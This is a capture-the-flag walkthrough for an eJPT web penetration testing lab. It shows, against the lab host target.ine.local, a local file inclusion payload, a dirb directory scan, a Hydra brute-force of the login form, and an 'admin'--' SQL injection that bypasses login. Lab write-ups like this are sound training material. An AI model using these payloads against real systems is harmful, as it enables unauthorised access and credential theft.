Welcome to our eJPT — 4.1 CTF 1 Web Application Penetration Testing lab.

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali Linux machine. The target website is accessible at http://target.ine.local.

Objective: Identify web application vulnerabilities in the target website and capture all the flags hidden within the environment.

Useful wordlists:

/usr/share/wordlists/dirb/common.txt 
/usr/share/seclists/Usernames/top-usernames-shortlist.txt 
/root/Desktop/wordlists/100-common-passwords.txt

Tool

  1. Nmap
  2. Dirb,gobuster
  3. Hydra

Step 1: In this step open the lab link to access the Kali GUI instance.

None

Step 2: In this step check if the target machine is reachable:

Command:

ping -c 4 target.ine.local
None

Step 3: In this step run an Nmap scan.

Command:

nmap -sV target.ine.local
None

Flag 1: Sometimes, important files are hidden in plain sight. Check the root ('/') directory for a file named 'flag.txt' that might hold the key to the first flag.

Step 4: In this case a web server is running on port 80 and the page shows a Select file button. I initially tried changing the filename in the URL from file1.txt to flag.txt but that failed.

None

What worked: perform an LFI (Local File Inclusion) by changing the file= parameter to traverse to the filesystem and read the root flag file. Example payload (used in the URL):

None
?file=/flag.txt
None
Then reveals the FLAG1!

Flag 2: Explore the structure of the server's directories. Enumeration might reveal hidden treasures.

Step 5: In this step explore the server's directory structure — enumeration often uncovers hidden files or directories.

What I did: ran a directory discovery scan (e.g., dirb/gobuster) against the target.

Command:

dirb http://target.ine.local /usr/share/wordlists/dirb/common.txt
None

Step 6: That revealed a directory named /secured.

None
http://target.ine.local/secured/flag.txt
None

Flag 3: The login form seems a bit weak. Trying out different combinations might just reveal the next flag.

Step 7: In this step navigate to the login page and identify the form action and field names.use Hydra (or another brute-force tool) with appropriate username and password lists against the http-post-form module. Example Hydra command:


hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /root/Desktop/wordlists/100-common-passwords.txt target.ine.local http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid username or password"
None

When valid credentials are found, log in with them and retrieve the third flag from the account/dashboard.

None
None
Then reveals the FLAG3!

Flag 4: The login form behaves oddly with unexpected inputs. Think of injection techniques to access the 'admin' account and find the flag.

Step 8: In this step Hint used: SQL injection. Enter the username:

admin'--

and any value for the password field. Submitting this input bypasses authentication (the injected input alters the SQL logic) and grants access to the admin account, where the final flag can be found.

None
Then reveals all FLAG!

Thankyou for Reading!

HAPPYCTFHACKING!